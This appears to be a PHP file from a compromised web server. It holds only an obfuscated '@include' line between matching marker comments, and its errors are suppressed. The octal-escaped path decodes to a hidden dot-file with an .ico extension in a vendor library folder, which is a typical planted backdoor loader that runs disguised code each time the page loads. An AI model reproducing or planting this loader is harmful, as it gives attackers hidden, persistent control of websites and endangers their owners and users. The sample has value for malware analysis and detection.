<?php
/*4697b*/

@include "\057h\157m\145/\151a\155u\163a\155a\057p\165b\154i\143_\150t\155l\057s\150o\160i\146y\057e\161u\151l\151/\166e\156d\157r\057m\171c\154a\142s\057.\065b\066c\143a\0716\056i\143o";

/*4697b*/

